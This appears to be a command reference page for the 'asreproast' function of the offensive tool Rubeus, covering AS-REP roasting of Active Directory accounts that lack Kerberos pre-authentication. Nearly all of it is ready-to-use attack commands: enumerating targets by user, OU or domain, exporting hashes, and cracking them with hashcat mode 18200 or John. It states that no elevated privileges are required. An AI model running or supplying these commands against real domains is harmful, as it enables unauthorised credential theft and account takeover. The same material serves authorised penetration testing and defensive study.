asreproast
AS-REP roast accounts that don't require Kerberos pre-authentication. Requests AS-REP without supplying pre-auth data, extracts the encrypted portion for offline cracking.
Usage
Rubeus.exe asreproast [/user:<username>] [/domain:<domain>] [/dc:<dc-ip>] [/ou:"OU=..."] [/ldaps] [/des] [/nowrap] [/outfile:<output>] [/format:hashcat|john] [/creduser:<domain>\<username>] [/credpassword:<password>]
Options
/user:<username>β target specific user (default: all preauth-disabled users)/domain:<domain>β target domain (default: current)/dc:<dc-ip>β domain controller/ou:"OU=..."β restrict to specific OU/ldapsβ use LDAPS (port 636) for enumeration/outfile:<output>β write hashes to file, one per line/format:hashcatβ output in hashcat format (mode 18200); default is John (Jumbo)/desβ request DES encryption (RC4 is default)/nowrapβ don't line-wrap/creduser:<domain>\<username>β alternate credentials for LDAP enumeration/credpassword:<password>β password for alternate credentials
Examples
# Roast all users without preauth in current domain
Rubeus.exe asreproast
# Roast specific user
Rubeus.exe asreproast /user:<username>
# Output Hashcat format to file
Rubeus.exe asreproast /outfile:<output> /format:hashcat
# Target specific OU
Rubeus.exe asreproast /ou:"OU=ServiceAccounts,DC=corp,DC=local" /format:hashcat /outfile:<output>
# Cross-domain
Rubeus.exe asreproast /domain:<domain>
# With alternate credentials (non-trusting domain)
Rubeus.exe asreproast /domain:<domain> /creduser:"<domain>\<username>" /credpassword:<password>
Crack Hashes
# Hashcat (mode 18200)
hashcat -m 18200 hashes.txt wordlist.txt
# John
john --wordlist=wordlist.txt hashes.txt
Notes
- Hash format (John):
$krb5asrep$<user>@<domain>:<hash> - Hash format (Hashcat):
$krb5asrep$23$<user>@<domain>:<hash> - Identifies accounts with
DONT_REQUIRE_PREAUTHflag set in userAccountControl - No elevated privileges required